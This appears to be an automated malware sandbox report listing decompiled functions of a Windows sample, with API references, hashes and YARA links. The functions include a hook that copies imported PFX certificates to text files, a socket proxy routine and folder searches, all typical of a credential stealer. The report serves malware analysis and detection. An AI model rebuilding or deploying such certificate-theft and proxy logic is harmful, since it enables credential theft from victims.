synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C2E3(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t43 = _t35 + 0x17c;
					E004133D0(_t43);
					E0040666E(_t36,  &_v716, 1);
					E00406312(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E00411A74( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E00413288( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
						E004119FD(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E004133D0(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x0040c2e3
0x0040c2e3
0x0040c2e6
0x0040c2f6
0x0040c30c
0x0040c312
0x0040c31f
0x0040c333
0x0040c33a
0x0040c341
0x0040c34f
0x0040c352
0x0040c355
0x0040c377
0x0040c384
0x0040c399
0x00000000
0x0040c39b
0x0040c39e
0x0040c3a4
0x00000000
0x0040c3a4
0x0040c379
0x0040c379
0x0040c379
0x0040c379
0x0040c3ab
0x0040c3ab
0x0040c3ab
0x0040c3ab
0x0040c3b0

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 0040C2FB
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 0040C355
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,00403400,00000000,?,?), ref: 0040C391
TerminateProcess.KERNEL32(?,00000000), ref: 0040C39E

Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133DF
Part of subcall function 004133D0: CloseHandle.KERNEL32(?,7519F560,0041AA96,00000000,00423E78,00000000,0041ABCB,00000000,00000000,0000004C,2937498D,?,00000000), ref: 004133E8

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: dc5acbe1ec0b9cd47354dd5da8324eee94509636cfcf92deee0d9e166540a4ff
Instruction ID: 761bd8e4a3ba8afe8f7f4fb860ebea5ca5f80798b442d20a374df077fe077db8
Opcode Fuzzy Hash: dc5acbe1ec0b9cd47354dd5da8324eee94509636cfcf92deee0d9e166540a4ff
Instruction Fuzzy Hash: 3111BB71500208AADB109FA5DC85FEF7BBCEF45704F04467AF905FA0A5DA789645CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0041512E, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041512E(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x00415175
0x00415181
0x00415186
0x00000000
0x00000000
0x00415161
0x00415149
0x00415150
0x0041515b
0x00000000
0x0041515b
0x00000000
0x00415149
0x00415161
0x00415189
0x00415191

APIs

PeekMessageW.USER32 ref: 0041516B
MsgWaitForMultipleObjects.USER32 ref: 0041517F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 4e14e444bd101229d7f8b9a47b5611f1ce4f606ff8ab428d72acc658b236ca12
Instruction ID: db4a99b2ab675b16b60f701b3d7582995fadf95a08b80e5b2655a0c9b4e8b245
Opcode Fuzzy Hash: 4e14e444bd101229d7f8b9a47b5611f1ce4f606ff8ab428d72acc658b236ca12
Instruction Fuzzy Hash: BCF0F632544309BBD710AA99DC48EEBBBACEB85754F050936FA10E2170D27698448675

Uniqueness

Uniqueness Score: -1.00%

Function 0040A2E5, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A2E5(void* __eflags) {
				void* _t1;
				void* _t2;
				long _t6;
				void* _t12;

				_t1 = E0040634D(_t12, __eflags, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E00406473();
					__eflags = _t2;
					if(_t2 == 0) {
						L7:
						E00415194(_t19);
						__eflags = 0;
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x4229f4, 0x1388);
					while(1) {
						__eflags = _t6 - 0x102;
						if(_t6 != 0x102) {
							break;
						}
						E0041A01E();
						_t6 = WaitForSingleObject( *0x4229f4, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x0040a2ed
0x0040a2f2
0x0040a2f6
0x0040a2fb
0x0040a300
0x0040a302
0x0040a346
0x0040a347
0x0040a34c
0x00000000
0x0040a34c
0x0040a310
0x0040a328
0x0040a33f
0x0040a33f
0x0040a341
0x00000000
0x00000000
0x0040a331
0x0040a33d
0x0040a33d
0x00000000
0x0040a345
0x00000000

APIs

Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E

GetCurrentThread.KERNEL32 ref: 0040A309
SetThreadPriority.KERNEL32(00000000,?,?,?,19367401,00000001), ref: 0040A310
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367401,00000001), ref: 0040A328

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: d6f1dc7dce18b87730eb882db9745df98d39ff1c0cca4e6d0b490d0b44f40e9c
Instruction ID: 0905efd6015b7175dd0862883eb9a05b3d7096a23aa4b4c50d8e2ae8627ed8f6
Opcode Fuzzy Hash: d6f1dc7dce18b87730eb882db9745df98d39ff1c0cca4e6d0b490d0b44f40e9c
Instruction Fuzzy Hash: 7AF0E9B2604308BAD6113BA5AD45DBB3A0DEB45358B240137BD05F21E2D6B94CA1527E

Uniqueness

Uniqueness Score: -1.00%

Function 00413036, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413036(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x0041303e
0x00413043
0x00413049
0x0041304b
0x00413050
0x00413057
0x0041305e
0x0041307a
0x0041306c
0x0041306e
0x0041306e
0x00413074
0x00413074
0x0041307f
0x00000000
0x00413085
0x0041308a

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413043
Thread32First.KERNEL32 ref: 0041305E
Thread32Next.KERNEL32 ref: 00413074
CloseHandle.KERNEL32(00000000), ref: 0041307F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 8745815149a873f12b4925ecfef575c332347333b19a6d6ec226962fb04f8061
Instruction ID: 27246d0090026b0f7170c3c43011ae4e6fefbe123c2443cefe0d361b416c3b14
Opcode Fuzzy Hash: 8745815149a873f12b4925ecfef575c332347333b19a6d6ec226962fb04f8061
Instruction Fuzzy Hash: 7DF08975900015ABD720AF69DD48DEF7FFCEB89351B004126FA11F2298D7389A45C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00409C13, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00409C13(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E00414F79(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E00414974(_t61, _t110) != 0) {
					while(E00414974(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E00409B9D(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00411A74( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E00414A09( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E00414DBC(_t116, _t127);
									_t84 = E00409B9D(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E00414BBD(_t110);
									}
									E00414D64(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E00414B03( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E00409B9D(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E00414D64(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E00414D34( &_v20,  &_a4);
									_v36 = _t126;
									E00414D64(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E00414DBC(_t116, _t126);
										_t110 = _a4;
										_t125 = E00409B9D(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E00414BBD(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E00414974(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E004119FD( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x00409c1d
0x00409c23
0x00409c33
0x00409c37
0x00409c3a
0x00409c3b
0x00409c47
0x00409c56
0x00409c54
0x00409c6b
0x00409c84
0x00409c92
0x00409c9b
0x00409d25
0x00409d29
0x00409d2d
0x00409e5b
0x00000000
0x00409e6b
0x00409d3a
0x00409d41
0x00409d42
0x00409d4a
0x00409d4b
0x00409dff
0x00409e09
0x00409e11
0x00409e16
0x00409d54
0x00409d54
0x00000000
0x00409d54
0x00409e1d
0x00409e29
0x00409e31
0x00409e3e
0x00409e46
0x00409e40
0x00409e40
0x00409e40
0x00409e33
0x00409e33
0x00409e34
0x00409e34
0x00409e4a
0x00409e53
0x00409df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00409e53
0x00409d52
0x00409d67
0x00409d69
0x00409d6f
0x00000000
0x00000000
0x00409d7d
0x00409d82
0x00409dda
0x00409dda
0x00409de2
0x00000000
0x00000000
0x00409deb
0x00409ded
0x00409ded
0x00000000
0x00409deb
0x00409d94
0x00409d96
0x00409d99
0x00409da1
0x00409db0
0x00409db8
0x00409dc8
0x00409dcd
0x00409dcf
0x00409dd2
0x00409dd2
0x00409dd7
0x00000000
0x00409dd7
0x00409da3
0x00409da6
0x00000000
0x00409da6
0x00000000
0x00409d52
0x00409ca1
0x00409ca3
0x00409cab
0x00409cb4
0x00000000
0x00000000
0x00409cb6
0x00409cb9
0x00409cc2
0x00409cd8
0x00409cdf
0x00409ce2
0x00409cea
0x00409cf2
0x00409d00
0x00409cfb
0x00409d13
0x00409d18
0x00409d1b
0x00409d23
0x00000000
0x00000000
0x00000000
0x00409d23
0x00409cfd
0x00409cfd
0x00000000
0x00409d04
0x00409cec
0x00409cec
0x00000000
0x00409cec
0x00409cc4
0x00409ccb
0x00000000
0x00000000
0x00000000
0x00409ccd
0x00000000
0x00409ca3
0x00409c54
0x00409c56
0x00409c49
0x00000000

APIs

Part of subcall function 00414F79: getsockname.WS2_32(?,?,?), ref: 00414F97

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00409CE2
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00409D1B

Part of subcall function 00414DBC: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00414DD2

Part of subcall function 00409B9D: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00409BC1

Part of subcall function 00414BBD: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00414C5D

Strings

Z, xrefs: 00409E55

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: e3c875e8580555f271ac47944e713231f5603c76ba3a90d48e5f93317c8855b4
Instruction ID: a830ca4c63c0a136eda8e5029f32784d9f97a13a694c305c4d3f1b8d25c8eb54
Opcode Fuzzy Hash: e3c875e8580555f271ac47944e713231f5603c76ba3a90d48e5f93317c8855b4
Instruction Fuzzy Hash: 14611632D04258AADF20AAA9CC45AEF77B9AF85314F04457BF911B32D3C63C8D45C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C8AB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040C8AB(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E00406473() != 0) {
					GetSystemTime( &_v760);
					E00419DD3(0xaa,  &_v600);
					_t74 =  &_v744;
					E00419DD3(0xab, _t74);
					E0040C68A( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E004126B4( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E0040B8B7(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E004119FD(_t79 + 0x48 + E00412510( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E00412818(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E0040B8B7(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E00412806( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x0040c8ab
0x0040c8b1
0x0040c8b8
0x0040c8c4
0x0040c8ca
0x0040c8d0
0x0040c910
0x0040c922
0x0040c927
0x0040c930
0x0040c93c
0x0040c946
0x0040c94c
0x0040c952
0x0040c955
0x0040c95d
0x0040c965
0x0040c968
0x0040c96d
0x0040c972
0x0040c977
0x0040c98f
0x0040c994
0x0040c9b7
0x0040c9c2
0x0040c9cb
0x0040c9dd
0x0040c9e2
0x0040c9e2
0x0040c9cb
0x0040c994
0x0040c977
0x0040c9f1

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0040C8C4

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GetSystemTime.KERNEL32(?), ref: 0040C910

Part of subcall function 0040C68A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C7E1,?,?,00000000), ref: 0040C69F

Strings

.txt, xrefs: 0040C9A6

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 03634207a40ecfb8661577a64da5af2b4e8534af22a1da0a46d78374d6ca9545
Instruction ID: e668a7ab3177a77715ac4e98b626459444f29f3581ab23a7d17919d0296052ed
Opcode Fuzzy Hash: 03634207a40ecfb8661577a64da5af2b4e8534af22a1da0a46d78374d6ca9545
Instruction Fuzzy Hash: A731B071100340DBCB20AF95C982FABB7A8EF98304F04462FF994E62D1D779D944C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040346C,00000000,00004401,0040347C,?,?,00000000,00000001), ref: 0040CCB1
CoCreateInstance.OLE32(0040343C,00000000,00004401,0040344C,?,?,00000000,00000001), ref: 0040CD04

Strings

D, xrefs: 0040CD2F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: 17f67add6a3f40f78143ad53b35499c2786be7ed58b7017445b3a7cdc9201742
Instruction ID: 184b066137aa604f3ab3a170599fe6c966207caff02cd2b4e11982d87ab4c9cf
Opcode Fuzzy Hash: 17f67add6a3f40f78143ad53b35499c2786be7ed58b7017445b3a7cdc9201742
Instruction Fuzzy Hash: B5315CB2204205AFE710DF64CCC5D6BBBECAF84744F10463AF954A7290E734DC468BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041601A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041601A(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E004119FD( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E004119FD( &_v284, _a12, 0x102);
					E00412E3D( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E00411D62(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x0041602a
0x00416030
0x00416035
0x00416038
0x0041603f
0x00416043
0x00416045
0x00416047
0x0041604b
0x0041604f
0x00416053
0x00416055
0x00416055
0x00416057
0x00416058
0x00416061
0x00416072
0x00416083
0x00416083
0x0041608c
0x0041608f
0x00416091
0x00416092
0x004160a0
0x004160a5
0x00000000
0x00416094
0x00416095
0x00416097
0x0041609c
0x004160a7
0x004160a7
0x004160ac
0x004160b1
0x004160b1
0x00416095
0x00416092
0x004160b7
0x004160bb
0x004160c4

APIs

StringFromGUID2.OLE32(00000000,?,00000028,00406347,?,00000010,00000000,77A19EB0), ref: 004160BB

Strings

Global\, xrefs: 00416097
Local\, xrefs: 004160A0

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: 7278306d349c395fd35799c7ffd7cd0995aa74f355f011cdb00bcf43f0c1c336
Instruction ID: 6921511f8213237aa3190551336601090e39465f08dfe03d5702416117fc8f62
Opcode Fuzzy Hash: 7278306d349c395fd35799c7ffd7cd0995aa74f355f011cdb00bcf43f0c1c336
Instruction Fuzzy Hash: 4A11047251024E66CF14DB74CC46FEF7BA9EB48705F01882BE612E6181DAB8D685C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E9E0(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				E00419DD3(0x81, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00411A74( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
						_t29 =  &_v16;
						E004170EA( &_v572,  &_v16, _t37, 1, 2, E0040E745,  &_v12, 0, 0, 0);
					}
					_t30 = _t30 + 1;
				} while (_t30 < 3);
				if(_v8 <= 0) {
					return E004119C1(_v12);
				}
				return E0040C9F4(_t29, _v12, 0xcb);
			}

0x0040e9eb
0x0040e9f3
0x0040e9fc
0x0040ea06
0x0040ea0d
0x0040ea14
0x0040ea1b
0x0040ea20
0x0040ea22
0x0040ea22
0x0040ea30
0x0040ea36
0x0040ea38
0x0040ea4a
0x0040ea53
0x0040ea53
0x0040ea58
0x0040ea59
0x0040ea61
0x00000000
0x0040ea7a
0x00000000

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008,?,00000000), ref: 0040EA30

Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

#, xrefs: 0040EA14
&, xrefs: 0040EA06

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&
API String ID: 3438805939-3870246384
Opcode ID: ae5a304d267eefeee88c612ad5191feef5d2736a9105343f3ee95a00ff78a942
Instruction ID: 06e93f8c3f0db108889f547c60c9b70597043ada0c843dadf72a7d0c0089bcad
Opcode Fuzzy Hash: ae5a304d267eefeee88c612ad5191feef5d2736a9105343f3ee95a00ff78a942
Instruction Fuzzy Hash: 8811A0B2A01228BADB209B92DC09FEF7F78FF45744F00416AF505B6190D7785B86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F301, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040F301(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v60;
				char _v580;
				void* __edi;
				void* __esi;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v60;
				E00419DD3(0x95, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00411A74( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v580;
